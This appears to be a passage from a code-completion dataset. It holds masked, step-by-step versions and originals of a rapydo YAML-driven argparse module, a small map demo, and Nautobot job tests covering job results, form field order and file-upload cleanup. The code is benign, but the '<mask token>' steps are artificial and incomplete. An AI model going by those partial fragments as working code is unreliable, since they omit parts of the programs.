pconf['default'] = default\n myhelp = '{} [default: 
{}]'.format(options.get('help'), default)\n pconf['help'] = myhelp\n if options.get('type') == 'bool':\n if default:\n pconf['action'] = 'store_false'\n else:\n pconf['action'] = 'store_true'\n else:\n pconf['type'] = str\n pconf['metavar'] = options.get('metavalue')\n if 'alias' in options:\n pconf['alias'] = options['alias']\n if 'positional' in options:\n pconf['positional'] = options['positional']\n return pconf\n",
"step-4": "<mask token>\nimport os\nimport sys\nimport argparse\nfrom controller import __version__, PROJECTRC, PROJECTRC_ALTERNATIVE\nfrom controller.conf_utilities import load_yaml_file\nfrom controller import log\n\n\nclass ArgParser:\n\n def __init__(self, args=None):\n if args is None:\n args = sys.argv\n self.current_args = {}\n self.host_configuration = {}\n self.check_args(args)\n self.read_configuration()\n parser = argparse.ArgumentParser(prog=args[0], description=self.\n parse_conf.get('description'))\n sorted_options = sorted(self.parse_conf.get('options', {}).items())\n for option_name, options in sorted_options:\n self.add_parser_argument(parser, option_name, options)\n version_string = 'rapydo version {}'.format(__version__)\n parser.add_argument('--version', action='version', version=\n version_string)\n main_command = self.parse_conf.get('action')\n subparsers = parser.add_subparsers(title='Available commands', dest\n =main_command.get('name'), help=main_command.get('help'))\n subparsers.required = True\n mycommands = self.parse_conf.get('subcommands', {})\n for command_name, options in sorted(mycommands.items()):\n subparse = subparsers.add_parser(command_name, help=options.get\n ('description'))\n suboptions = options.get('suboptions', {}).items()\n for option_name, suboptions in suboptions:\n self.add_parser_argument(subparse, option_name, suboptions)\n if len(args) == 1:\n parser.print_help()\n sys.exit(1)\n current_args_namespace, self.remaining_args = parser.parse_known_args(\n args[1:])\n self.current_args = vars(current_args_namespace)\n self.extra_parser = argparse.ArgumentParser(description=\n 'Custom rapydo commands from your own configuration', add_help=\n False, usage=\"\"\"\n$ rapydo custom CUSTOM_COMMAND\"\"\")\n self.extra_command_parser = self.extra_parser.add_subparsers(title=\n 'Available custom commands', dest='custom', help=\n 'list of custom commands')\n self.extra_command_parser.required = True\n if 
self.current_args.get('log_level', 'DEPRECATED') != 'DEPRECATED':\n log.warning(\n '--log-level parameter is deprecated, set env variable LOGURU_LEVEL'\n )\n log.verbose('Parsed arguments: {}', self.current_args)\n\n def add_parser_argument(self, parser, option_name, options):\n params = self.prepare_params(options)\n alias = params.pop('alias', None)\n positional = params.pop('positional', False)\n param_name = '--{}'.format(option_name)\n if positional:\n parser.add_argument(option_name, **params)\n elif alias is None:\n parser.add_argument(param_name, **params)\n else:\n parser.add_argument(param_name, '-{}'.format(alias), **params)\n\n @staticmethod\n def check_args(args):\n for element in args:\n if element.startswith('--') and '_' in element:\n raise ValueError('Wrong \"{}\" option provided.\\n'.format(\n element) +\n \"\"\"Arguments containing '_' are not allowed.\n\"\"\" +\n \"Use '-' instead\\n\")\n\n def read_configuration(self):\n self.parse_conf = load_yaml_file('argparser.yaml', path=os.path.\n dirname(os.path.realpath(__file__)))\n try:\n pinit_conf = load_yaml_file(PROJECTRC, path=os.curdir,\n is_optional=True)\n if len(pinit_conf) < 1:\n pinit_conf = load_yaml_file(PROJECTRC_ALTERNATIVE, path=os.\n curdir, is_optional=True)\n except AttributeError as e:\n log.exit(e)\n self.host_configuration = pinit_conf.pop('project_configuration', {})\n for key, value in pinit_conf.items():\n if value is None:\n continue\n if not isinstance(value, dict):\n if key in self.parse_conf['options']:\n self.parse_conf['options'][key]['default'] = value\n else:\n print('\\nUnknown parameter {} found in {}\\n'.format(key,\n PROJECTRC))\n elif key not in self.parse_conf['subcommands']:\n print('\\nUnknown command {} found in {}\\n'.format(key,\n PROJECTRC))\n else:\n conf = self.parse_conf['subcommands'][key]['suboptions']\n for subkey, subvalue in value.items():\n if subkey in conf:\n conf[subkey]['default'] = subvalue\n else:\n print('Unknown parameter {}/{} found in 
{}\\n'.\n format(key, subkey, PROJECTRC))\n\n @staticmethod\n def prepare_params(options):\n pconf = {}\n default = options.get('default')\n pconf['default'] = default\n myhelp = '{} [default: {}]'.format(options.get('help'), default)\n pconf['help'] = myhelp\n if options.get('type') == 'bool':\n if default:\n pconf['action'] = 'store_false'\n else:\n pconf['action'] = 'store_true'\n else:\n pconf['type'] = str\n pconf['metavar'] = options.get('metavalue')\n if 'alias' in options:\n pconf['alias'] = options['alias']\n if 'positional' in options:\n pconf['positional'] = options['positional']\n return pconf\n",
"step-5": "# -*- coding: utf-8 -*-\n\n\"\"\"\nAutomatically create and parse commands\nbased on a YAML configuration file.\n\nNOTE: we can't have a logger here,\nbefore knowing the level of debug.\n\"\"\"\n\nimport os\nimport sys\nimport argparse\nfrom controller import __version__, PROJECTRC, PROJECTRC_ALTERNATIVE\nfrom controller.conf_utilities import load_yaml_file\nfrom controller import log\n\n\nclass ArgParser:\n def __init__(self, args=None):\n if args is None:\n args = sys.argv\n\n self.current_args = {}\n self.host_configuration = {}\n # This method can raise ValueErrors\n self.check_args(args)\n\n # This method saves configuration objects in self\n self.read_configuration()\n\n # Arguments definition\n parser = argparse.ArgumentParser(\n prog=args[0], description=self.parse_conf.get('description')\n )\n\n # PARAMETERS\n sorted_options = sorted(self.parse_conf.get('options', {}).items())\n for option_name, options in sorted_options:\n self.add_parser_argument(parser, option_name, options)\n\n version_string = 'rapydo version {}'.format(__version__)\n parser.add_argument('--version', action='version', version=version_string)\n # Sub-parser of commands [check, init, etc]\n main_command = self.parse_conf.get('action')\n\n subparsers = parser.add_subparsers(\n title='Available commands',\n dest=main_command.get('name'),\n help=main_command.get('help'),\n )\n\n subparsers.required = True\n\n # ##########################\n # COMMANDS\n\n # BASE normal commands\n mycommands = self.parse_conf.get('subcommands', {})\n\n for command_name, options in sorted(mycommands.items()):\n\n # Creating a parser for each sub-command [check, init, etc]\n subparse = subparsers.add_parser(\n command_name, help=options.get('description')\n )\n\n # controlcommands = options.get('controlcommands', {})\n # # Some subcommands can have further subcommands\n # [control start, stop, etc]\n # if len(controlcommands) > 0:\n # innerparser = subparse.add_subparsers(\n # 
dest='controlcommand'\n # )\n # innerparser.required = options.get('controlrequired', False)\n # for subcommand, suboptions in controlcommands.items():\n # subcommand_help = suboptions.pop(0)\n # # Creating a parser for each sub-sub-command\n # # [control start/stop]\n # innerparser.add_parser(subcommand, help=subcommand_help)\n\n suboptions = options.get('suboptions', {}).items()\n for option_name, suboptions in suboptions:\n self.add_parser_argument(subparse, option_name, suboptions)\n\n # ##########################\n # Print usage if no arguments provided\n if len(args) == 1:\n parser.print_help()\n sys.exit(1)\n\n # ##########################\n # Reading input parameters\n\n # Partial parsing\n # https://docs.python.org/3.4/library/argparse.html#partial-parsing\n # Example\n # https://gist.github.com/von/949337/\n\n # self.current_args = parser.parse_args()\n current_args_namespace, self.remaining_args = parser.parse_known_args(args[1:])\n self.current_args = vars(current_args_namespace)\n\n # custom commands as a separate parser\n self.extra_parser = argparse.ArgumentParser(\n description='Custom rapydo commands from your own configuration',\n add_help=False,\n usage='\\n$ rapydo custom CUSTOM_COMMAND',\n )\n self.extra_command_parser = self.extra_parser.add_subparsers(\n title='Available custom commands',\n dest='custom',\n help='list of custom commands',\n )\n self.extra_command_parser.required = True\n\n # ##########################\n if self.current_args.get(\"log_level\", \"DEPRECATED\") != \"DEPRECATED\":\n # Deprecated since version 0.7.0\n log.warning(\n \"--log-level parameter is deprecated, set env variable LOGURU_LEVEL\")\n\n log.verbose(\"Parsed arguments: {}\", self.current_args)\n\n def add_parser_argument(self, parser, option_name, options):\n params = self.prepare_params(options)\n alias = params.pop('alias', None)\n positional = params.pop('positional', False)\n param_name = '--{}'.format(option_name)\n if positional:\n 
parser.add_argument(option_name, **params)\n elif alias is None:\n parser.add_argument(param_name, **params)\n else:\n parser.add_argument(param_name, '-{}'.format(alias), **params)\n\n @staticmethod\n def check_args(args):\n # Check on format\n for element in args:\n if element.startswith('--') and '_' in element:\n raise ValueError(\n \"Wrong \\\"{}\\\" option provided.\\n\".format(element)\n + \"Arguments containing '_' are not allowed.\\n\"\n + \"Use '-' instead\\n\"\n )\n # NOTE: the standard is to use only '-' separators for arguments\n # beware: argparse converts them into '_' when you want to retrieve\n\n def read_configuration(self):\n # READ MAIN FILE WITH COMMANDS AND OPTIONS\n\n self.parse_conf = load_yaml_file(\n 'argparser.yaml', path=os.path.dirname(os.path.realpath(__file__))\n )\n\n try:\n # READ PROJECT INIT FILE: .projectrc\n pinit_conf = load_yaml_file(\n PROJECTRC, path=os.curdir, is_optional=True)\n # Allow alternative for PROJECT INIT FILE: .project.yml\n if len(pinit_conf) < 1:\n pinit_conf = load_yaml_file(\n PROJECTRC_ALTERNATIVE, path=os.curdir, is_optional=True)\n except AttributeError as e:\n log.exit(e)\n\n self.host_configuration = pinit_conf.pop('project_configuration', {})\n\n # Mix with parse_conf\n for key, value in pinit_conf.items():\n # value = pinit_conf.get(key, None)\n\n if value is None:\n continue\n\n if not isinstance(value, dict):\n # This is a first level option\n if key in self.parse_conf['options']:\n self.parse_conf['options'][key]['default'] = value\n else:\n print(\"\\nUnknown parameter {} found in {}\\n\".format(key, PROJECTRC))\n else:\n # This is a second level parameter\n if key not in self.parse_conf['subcommands']:\n print(\"\\nUnknown command {} found in {}\\n\".format(key, PROJECTRC))\n else:\n conf = self.parse_conf['subcommands'][key]['suboptions']\n for subkey, subvalue in value.items():\n if subkey in conf:\n conf[subkey]['default'] = subvalue\n else:\n print(\"Unknown parameter {}/{} found in 
{}\\n\".format(\n key, subkey, PROJECTRC))\n\n @staticmethod\n def prepare_params(options):\n\n pconf = {}\n default = options.get('default')\n pconf['default'] = default\n\n myhelp = \"{} [default: {}]\".format(options.get('help'), default)\n pconf['help'] = myhelp\n\n if options.get('type') == 'bool':\n\n if default:\n pconf['action'] = 'store_false'\n else:\n pconf['action'] = 'store_true'\n\n else:\n # type and metavar are allowed for bool\n pconf['type'] = str\n pconf['metavar'] = options.get('metavalue')\n\n if 'alias' in options:\n pconf['alias'] = options['alias']\n\n if 'positional' in options:\n pconf['positional'] = options['positional']\n\n return pconf\n",
"step-ids": [
4,
5,
6,
7,
8
]
}
|
[
4,
5,
6,
7,
8
] |
def func(n):
    """Return *n* doubled (works for any type supporting ``*`` with an int)."""
    doubled = 2 * n
    return doubled
def my_map(f, seq):
    """Apply *f* to every element of *seq* and return the results as a list."""
    return list(map(f, seq))
def main():
    """Print the same doubled list twice: once via map(), once via a comprehension."""
    numbers = [1, 2, 3, 4]
    # Built-in map() driven through the shared helper.
    doubled = list(map(func, numbers))
    print(doubled)
    # Equivalent list comprehension; output is identical.
    doubled = [func(value) for value in numbers]
    print(doubled)
# Run the demo only when executed as a script, not when imported as a module.
if __name__ == '__main__':
    main()
|
normal
|
{
"blob_id": "55acae8129ddaba9a860d5d356e91f40607ac95a",
"index": 8614,
"step-1": "<mask token>\n",
"step-2": "def func(n):\n return n * 2\n\n\ndef my_map(f, seq):\n return [f(item) for item in seq]\n\n\n<mask token>\n",
"step-3": "def func(n):\n return n * 2\n\n\ndef my_map(f, seq):\n return [f(item) for item in seq]\n\n\ndef main():\n numbers = [1, 2, 3, 4]\n result = list(map(func, numbers))\n print(result)\n result = [func(item) for item in numbers]\n print(result)\n\n\n<mask token>\n",
"step-4": "def func(n):\n return n * 2\n\n\ndef my_map(f, seq):\n return [f(item) for item in seq]\n\n\ndef main():\n numbers = [1, 2, 3, 4]\n result = list(map(func, numbers))\n print(result)\n result = [func(item) for item in numbers]\n print(result)\n\n\nif __name__ == '__main__':\n main()\n",
"step-5": null,
"step-ids": [
0,
2,
3,
4
]
}
|
[
0,
2,
3,
4
] |
import json
import os
import uuid
from django.core.files.uploadedfile import SimpleUploadedFile
from django.conf import settings
from django.contrib.contenttypes.models import ContentType
from nautobot.dcim.models import Site
from nautobot.extras.choices import JobResultStatusChoices
from nautobot.extras.jobs import get_job, run_job
from nautobot.extras.models import FileAttachment, FileProxy, JobResult
from nautobot.utilities.testing import TestCase
class JobTest(TestCase):
    """
    Test basic jobs to ensure importing works.

    Each test points JOBS_ROOT at the dummy_jobs fixture directory and loads a
    job class via its ``local/<module>/<name>`` path.
    """
    # Show full diffs on assertion failures (the HTML comparisons below are long).
    maxDiff = None
    @classmethod
    def setUpTestData(cls):
        # Cached once for the class: the ContentType row that JobResult rows reference.
        cls.job_content_type = ContentType.objects.get(app_label="extras", model="job")
    def test_job_pass(self):
        """
        Job test with pass result.
        """
        with self.settings(JOBS_ROOT=os.path.join(settings.BASE_DIR, "extras/tests/dummy_jobs")):
            module = "test_pass"
            name = "TestPass"
            job_class = get_job(f"local/{module}/{name}")
            job_result = JobResult.objects.create(
                name=job_class.class_path,
                obj_type=self.job_content_type,
                user=None,
                job_id=uuid.uuid4(),
            )
            # commit=False: exercise the dry-run path; the job should still complete.
            run_job(data={}, request=None, commit=False, job_result_pk=job_result.pk)
            job_result.refresh_from_db()
            self.assertEqual(job_result.status, JobResultStatusChoices.STATUS_COMPLETED)
    def test_job_fail(self):
        """
        Job test with fail result.
        """
        with self.settings(JOBS_ROOT=os.path.join(settings.BASE_DIR, "extras/tests/dummy_jobs")):
            module = "test_fail"
            name = "TestFail"
            job_class = get_job(f"local/{module}/{name}")
            job_result = JobResult.objects.create(
                name=job_class.class_path,
                obj_type=self.job_content_type,
                user=None,
                job_id=uuid.uuid4(),
            )
            run_job(data={}, request=None, commit=False, job_result_pk=job_result.pk)
            job_result.refresh_from_db()
            # A job that raises should land in ERRORED state.
            self.assertEqual(job_result.status, JobResultStatusChoices.STATUS_ERRORED)
    def test_field_order(self):
        """
        Job test with field order.
        """
        with self.settings(JOBS_ROOT=os.path.join(settings.BASE_DIR, "extras/tests/dummy_jobs")):
            module = "test_field_order"
            name = "TestFieldOrder"
            job_class = get_job(f"local/{module}/{name}")
            form = job_class().as_form()
            # With field_order declared, var2 must render before var23.
            self.assertHTMLEqual(
                form.as_table(),
                """<tr><th><label for="id_var2">Var2:</label></th><td>
<input class="form-control form-control" id="id_var2" name="var2" placeholder="None" required type="text">
<br><span class="helptext">Hello</span></td></tr>
<tr><th><label for="id_var23">Var23:</label></th><td>
<input class="form-control form-control" id="id_var23" name="var23" placeholder="None" required type="text">
<br><span class="helptext">I want to be second</span></td></tr>
<tr><th><label for="id__commit">Commit changes:</label></th><td>
<input checked id="id__commit" name="_commit" placeholder="Commit changes" type="checkbox">
<br><span class="helptext">Commit changes to the database (uncheck for a dry-run)</span></td></tr>""",
            )
    def test_no_field_order(self):
        """
        Job test without field_order.
        """
        with self.settings(JOBS_ROOT=os.path.join(settings.BASE_DIR, "extras/tests/dummy_jobs")):
            module = "test_no_field_order"
            name = "TestNoFieldOrder"
            job_class = get_job(f"local/{module}/{name}")
            form = job_class().as_form()
            # Without field_order, fields render in declaration order (var23 first).
            self.assertHTMLEqual(
                form.as_table(),
                """<tr><th><label for="id_var23">Var23:</label></th><td>
<input class="form-control form-control" id="id_var23" name="var23" placeholder="None" required type="text">
<br><span class="helptext">I want to be second</span></td></tr>
<tr><th><label for="id_var2">Var2:</label></th><td>
<input class="form-control form-control" id="id_var2" name="var2" placeholder="None" required type="text">
<br><span class="helptext">Hello</span></td></tr>
<tr><th><label for="id__commit">Commit changes:</label></th><td>
<input checked id="id__commit" name="_commit" placeholder="Commit changes" type="checkbox">
<br><span class="helptext">Commit changes to the database (uncheck for a dry-run)</span></td></tr>""",
            )
    def test_ready_only_job_pass(self):
        """
        Job read only test with pass result.
        """
        # NOTE(review): "ready_only" looks like a typo for "read_only" -- renaming
        # changes which test the runner discovers, so confirm before touching it.
        with self.settings(JOBS_ROOT=os.path.join(settings.BASE_DIR, "extras/tests/dummy_jobs")):
            module = "test_read_only_pass"
            name = "TestReadOnlyPass"
            job_class = get_job(f"local/{module}/{name}")
            job_result = JobResult.objects.create(
                name=job_class.class_path,
                obj_type=self.job_content_type,
                user=None,
                job_id=uuid.uuid4(),
            )
            run_job(data={}, request=None, commit=False, job_result_pk=job_result.pk)
            job_result.refresh_from_db()
            self.assertEqual(job_result.status, JobResultStatusChoices.STATUS_COMPLETED)
            self.assertEqual(Site.objects.count(), 0)  # Ensure DB transaction was aborted
    def test_read_only_job_fail(self):
        """
        Job read only test with fail result.
        """
        with self.settings(JOBS_ROOT=os.path.join(settings.BASE_DIR, "extras/tests/dummy_jobs")):
            module = "test_read_only_fail"
            name = "TestReadOnlyFail"
            job_class = get_job(f"local/{module}/{name}")
            job_result = JobResult.objects.create(
                name=job_class.class_path,
                obj_type=self.job_content_type,
                user=None,
                job_id=uuid.uuid4(),
            )
            run_job(data={}, request=None, commit=False, job_result_pk=job_result.pk)
            job_result.refresh_from_db()
            self.assertEqual(job_result.status, JobResultStatusChoices.STATUS_ERRORED)
            self.assertEqual(Site.objects.count(), 0)  # Ensure DB transaction was aborted
            # Also ensure the standard log message about aborting the transaction is *not* present
            self.assertNotEqual(
                job_result.data["run"]["log"][-1][-1], "Database changes have been reverted due to error."
            )
    def test_read_only_no_commit_field(self):
        """
        Job read only test commit field is not shown.
        """
        with self.settings(JOBS_ROOT=os.path.join(settings.BASE_DIR, "extras/tests/dummy_jobs")):
            module = "test_read_only_no_commit_field"
            name = "TestReadOnlyNoCommitField"
            job_class = get_job(f"local/{module}/{name}")
            form = job_class().as_form()
            # The commit toggle is rendered as a hidden False input, not a checkbox.
            self.assertHTMLEqual(
                form.as_table(),
                """<tr><th><label for="id_var">Var:</label></th><td>
<input class="form-control form-control" id="id_var" name="var" placeholder="None" required type="text">
<br><span class="helptext">Hello</span><input id="id__commit" name="_commit" type="hidden" value="False"></td></tr>""",
            )
    def test_ip_address_vars(self):
        """
        Test that IPAddress variable fields behave as expected.

        This test case exercises the following types for both IPv4 and IPv6:
        - IPAddressVar
        - IPAddressWithMaskVar
        - IPNetworkVar
        """
        with self.settings(JOBS_ROOT=os.path.join(settings.BASE_DIR, "extras/tests/dummy_jobs")):
            module = "test_ipaddress_vars"
            name = "TestIPAddresses"
            job_class = get_job(f"local/{module}/{name}")
            # Fill out the form
            form_data = dict(
                ipv4_address="1.2.3.4",
                ipv4_with_mask="1.2.3.4/32",
                ipv4_network="1.2.3.0/24",
                ipv6_address="2001:db8::1",
                ipv6_with_mask="2001:db8::1/64",
                ipv6_network="2001:db8::/64",
            )
            form = job_class().as_form(form_data)
            self.assertTrue(form.is_valid())
            # Prepare the job data
            job_result = JobResult.objects.create(
                name=job_class.class_path,
                obj_type=self.job_content_type,
                user=None,
                job_id=uuid.uuid4(),
            )
            data = job_class.serialize_data(form.cleaned_data)
            # Run the job and extract the job payload data
            run_job(data=data, request=None, commit=False, job_result_pk=job_result.pk)
            job_result.refresh_from_db()
            job_payload = job_result.data["run"]["log"][0][2]  # Indexing makes me sad.
            job_result_data = json.loads(job_payload)
            # The job is expected to echo the submitted values back as JSON,
            # so the round-tripped payload must equal the form input exactly.
            self.assertEqual(job_result.status, JobResultStatusChoices.STATUS_COMPLETED)
            self.assertEqual(form_data, job_result_data)
class JobFileUploadTest(TestCase):
    """Test a job that uploads/deletes files.

    Verifies that an uploaded file is serialized into a FileProxy before the
    job runs, and that the FileProxy is removed afterwards whether the job
    succeeds or fails.
    """
    @classmethod
    def setUpTestData(cls):
        # One in-memory upload shared by every test; setUp() rewinds it.
        cls.file_contents = b"I am content.\n"
        cls.dummy_file = SimpleUploadedFile(name="dummy.txt", content=cls.file_contents)
        cls.job_content_type = ContentType.objects.get(app_label="extras", model="job")
    def setUp(self):
        self.dummy_file.seek(0)  # Reset cursor so we can read it again.
    def test_run_job_pass(self):
        """Test that file upload succeeds; job SUCCEEDS; and files are deleted."""
        with self.settings(JOBS_ROOT=os.path.join(settings.BASE_DIR, "extras/tests/dummy_jobs")):
            job_name = "local/test_file_upload_pass/TestFileUploadPass"
            job_class = get_job(job_name)
            job_result = JobResult.objects.create(
                name=job_class.class_path,
                obj_type=self.job_content_type,
                user=None,
                job_id=uuid.uuid4(),
            )
            # Serialize the file to FileProxy
            data = {"file": self.dummy_file}
            form = job_class().as_form(files=data)
            self.assertTrue(form.is_valid())
            serialized_data = job_class.serialize_data(form.cleaned_data)
            # Assert that the file was serialized to a FileProxy
            self.assertTrue(isinstance(serialized_data["file"], uuid.UUID))
            self.assertEqual(serialized_data["file"], FileProxy.objects.latest().pk)
            self.assertEqual(FileProxy.objects.count(), 1)
            # Run the job
            run_job(data=serialized_data, request=None, commit=False, job_result_pk=job_result.pk)
            job_result.refresh_from_db()
            # Assert that file contents were correctly read
            self.assertEqual(
                job_result.data["run"]["log"][0][2], f"File contents: {self.file_contents}"  # "File contents: ..."
            )
            # Assert that FileProxy was cleaned up
            self.assertEqual(FileProxy.objects.count(), 0)
    def test_run_job_fail(self):
        """Test that file upload succeeds; job FAILS; files deleted."""
        with self.settings(JOBS_ROOT=os.path.join(settings.BASE_DIR, "extras/tests/dummy_jobs")):
            job_name = "local/test_file_upload_fail/TestFileUploadFail"
            job_class = get_job(job_name)
            job_result = JobResult.objects.create(
                name=job_class.class_path,
                obj_type=self.job_content_type,
                user=None,
                job_id=uuid.uuid4(),
            )
            # Serialize the file to FileProxy
            data = {"file": self.dummy_file}
            form = job_class().as_form(files=data)
            self.assertTrue(form.is_valid())
            serialized_data = job_class.serialize_data(form.cleaned_data)
            # Assert that the file was serialized to a FileProxy
            self.assertTrue(isinstance(serialized_data["file"], uuid.UUID))
            self.assertEqual(serialized_data["file"], FileProxy.objects.latest().pk)
            self.assertEqual(FileProxy.objects.count(), 1)
            # Run the job
            run_job(data=serialized_data, request=None, commit=False, job_result_pk=job_result.pk)
            job_result.refresh_from_db()
            # Assert that file contents were correctly read
            self.assertEqual(
                job_result.data["run"]["log"][0][2], f"File contents: {self.file_contents}"  # "File contents: ..."
            )
            # Also ensure the standard log message about aborting the transaction is present
            self.assertEqual(job_result.data["run"]["log"][-1][-1], "Database changes have been reverted due to error.")
            # Assert that FileProxy was cleaned up
            self.assertEqual(FileProxy.objects.count(), 0)
|
normal
|
{
"blob_id": "d2298ad1e4737b983ba6d1f2fff59750137510b5",
"index": 904,
"step-1": "<mask token>\n\n\nclass JobTest(TestCase):\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n\n def test_field_order(self):\n \"\"\"\n Job test with field order.\n \"\"\"\n with self.settings(JOBS_ROOT=os.path.join(settings.BASE_DIR,\n 'extras/tests/dummy_jobs')):\n module = 'test_field_order'\n name = 'TestFieldOrder'\n job_class = get_job(f'local/{module}/{name}')\n form = job_class().as_form()\n self.assertHTMLEqual(form.as_table(),\n \"\"\"<tr><th><label for=\"id_var2\">Var2:</label></th><td>\n<input class=\"form-control form-control\" id=\"id_var2\" name=\"var2\" placeholder=\"None\" required type=\"text\">\n<br><span class=\"helptext\">Hello</span></td></tr>\n<tr><th><label for=\"id_var23\">Var23:</label></th><td>\n<input class=\"form-control form-control\" id=\"id_var23\" name=\"var23\" placeholder=\"None\" required type=\"text\">\n<br><span class=\"helptext\">I want to be second</span></td></tr>\n<tr><th><label for=\"id__commit\">Commit changes:</label></th><td>\n<input checked id=\"id__commit\" name=\"_commit\" placeholder=\"Commit changes\" type=\"checkbox\">\n<br><span class=\"helptext\">Commit changes to the database (uncheck for a dry-run)</span></td></tr>\"\"\"\n )\n <mask token>\n\n def test_ready_only_job_pass(self):\n \"\"\"\n Job read only test with pass result.\n \"\"\"\n with self.settings(JOBS_ROOT=os.path.join(settings.BASE_DIR,\n 'extras/tests/dummy_jobs')):\n module = 'test_read_only_pass'\n name = 'TestReadOnlyPass'\n job_class = get_job(f'local/{module}/{name}')\n job_result = JobResult.objects.create(name=job_class.class_path,\n obj_type=self.job_content_type, user=None, job_id=uuid.uuid4())\n run_job(data={}, request=None, commit=False, job_result_pk=\n job_result.pk)\n job_result.refresh_from_db()\n self.assertEqual(job_result.status, JobResultStatusChoices.\n STATUS_COMPLETED)\n self.assertEqual(Site.objects.count(), 0)\n <mask token>\n\n def test_read_only_no_commit_field(self):\n \"\"\"\n Job read 
only test commit field is not shown.\n \"\"\"\n with self.settings(JOBS_ROOT=os.path.join(settings.BASE_DIR,\n 'extras/tests/dummy_jobs')):\n module = 'test_read_only_no_commit_field'\n name = 'TestReadOnlyNoCommitField'\n job_class = get_job(f'local/{module}/{name}')\n form = job_class().as_form()\n self.assertHTMLEqual(form.as_table(),\n \"\"\"<tr><th><label for=\"id_var\">Var:</label></th><td>\n<input class=\"form-control form-control\" id=\"id_var\" name=\"var\" placeholder=\"None\" required type=\"text\">\n<br><span class=\"helptext\">Hello</span><input id=\"id__commit\" name=\"_commit\" type=\"hidden\" value=\"False\"></td></tr>\"\"\"\n )\n <mask token>\n\n\nclass JobFileUploadTest(TestCase):\n \"\"\"Test a job that uploads/deletes files.\"\"\"\n\n @classmethod\n def setUpTestData(cls):\n cls.file_contents = b'I am content.\\n'\n cls.dummy_file = SimpleUploadedFile(name='dummy.txt', content=cls.\n file_contents)\n cls.job_content_type = ContentType.objects.get(app_label='extras',\n model='job')\n\n def setUp(self):\n self.dummy_file.seek(0)\n\n def test_run_job_pass(self):\n \"\"\"Test that file upload succeeds; job SUCCEEDS; and files are deleted.\"\"\"\n with self.settings(JOBS_ROOT=os.path.join(settings.BASE_DIR,\n 'extras/tests/dummy_jobs')):\n job_name = 'local/test_file_upload_pass/TestFileUploadPass'\n job_class = get_job(job_name)\n job_result = JobResult.objects.create(name=job_class.class_path,\n obj_type=self.job_content_type, user=None, job_id=uuid.uuid4())\n data = {'file': self.dummy_file}\n form = job_class().as_form(files=data)\n self.assertTrue(form.is_valid())\n serialized_data = job_class.serialize_data(form.cleaned_data)\n self.assertTrue(isinstance(serialized_data['file'], uuid.UUID))\n self.assertEqual(serialized_data['file'], FileProxy.objects.\n latest().pk)\n self.assertEqual(FileProxy.objects.count(), 1)\n run_job(data=serialized_data, request=None, commit=False,\n job_result_pk=job_result.pk)\n job_result.refresh_from_db()\n 
self.assertEqual(job_result.data['run']['log'][0][2],\n f'File contents: {self.file_contents}')\n self.assertEqual(FileProxy.objects.count(), 0)\n\n def test_run_job_fail(self):\n \"\"\"Test that file upload succeeds; job FAILS; files deleted.\"\"\"\n with self.settings(JOBS_ROOT=os.path.join(settings.BASE_DIR,\n 'extras/tests/dummy_jobs')):\n job_name = 'local/test_file_upload_fail/TestFileUploadFail'\n job_class = get_job(job_name)\n job_result = JobResult.objects.create(name=job_class.class_path,\n obj_type=self.job_content_type, user=None, job_id=uuid.uuid4())\n data = {'file': self.dummy_file}\n form = job_class().as_form(files=data)\n self.assertTrue(form.is_valid())\n serialized_data = job_class.serialize_data(form.cleaned_data)\n self.assertTrue(isinstance(serialized_data['file'], uuid.UUID))\n self.assertEqual(serialized_data['file'], FileProxy.objects.\n latest().pk)\n self.assertEqual(FileProxy.objects.count(), 1)\n run_job(data=serialized_data, request=None, commit=False,\n job_result_pk=job_result.pk)\n job_result.refresh_from_db()\n self.assertEqual(job_result.data['run']['log'][0][2],\n f'File contents: {self.file_contents}')\n self.assertEqual(job_result.data['run']['log'][-1][-1],\n 'Database changes have been reverted due to error.')\n self.assertEqual(FileProxy.objects.count(), 0)\n",
"step-2": "<mask token>\n\n\nclass JobTest(TestCase):\n <mask token>\n <mask token>\n\n @classmethod\n def setUpTestData(cls):\n cls.job_content_type = ContentType.objects.get(app_label='extras',\n model='job')\n\n def test_job_pass(self):\n \"\"\"\n Job test with pass result.\n \"\"\"\n with self.settings(JOBS_ROOT=os.path.join(settings.BASE_DIR,\n 'extras/tests/dummy_jobs')):\n module = 'test_pass'\n name = 'TestPass'\n job_class = get_job(f'local/{module}/{name}')\n job_result = JobResult.objects.create(name=job_class.class_path,\n obj_type=self.job_content_type, user=None, job_id=uuid.uuid4())\n run_job(data={}, request=None, commit=False, job_result_pk=\n job_result.pk)\n job_result.refresh_from_db()\n self.assertEqual(job_result.status, JobResultStatusChoices.\n STATUS_COMPLETED)\n <mask token>\n\n def test_field_order(self):\n \"\"\"\n Job test with field order.\n \"\"\"\n with self.settings(JOBS_ROOT=os.path.join(settings.BASE_DIR,\n 'extras/tests/dummy_jobs')):\n module = 'test_field_order'\n name = 'TestFieldOrder'\n job_class = get_job(f'local/{module}/{name}')\n form = job_class().as_form()\n self.assertHTMLEqual(form.as_table(),\n \"\"\"<tr><th><label for=\"id_var2\">Var2:</label></th><td>\n<input class=\"form-control form-control\" id=\"id_var2\" name=\"var2\" placeholder=\"None\" required type=\"text\">\n<br><span class=\"helptext\">Hello</span></td></tr>\n<tr><th><label for=\"id_var23\">Var23:</label></th><td>\n<input class=\"form-control form-control\" id=\"id_var23\" name=\"var23\" placeholder=\"None\" required type=\"text\">\n<br><span class=\"helptext\">I want to be second</span></td></tr>\n<tr><th><label for=\"id__commit\">Commit changes:</label></th><td>\n<input checked id=\"id__commit\" name=\"_commit\" placeholder=\"Commit changes\" type=\"checkbox\">\n<br><span class=\"helptext\">Commit changes to the database (uncheck for a dry-run)</span></td></tr>\"\"\"\n )\n\n def test_no_field_order(self):\n \"\"\"\n Job test without field_order.\n 
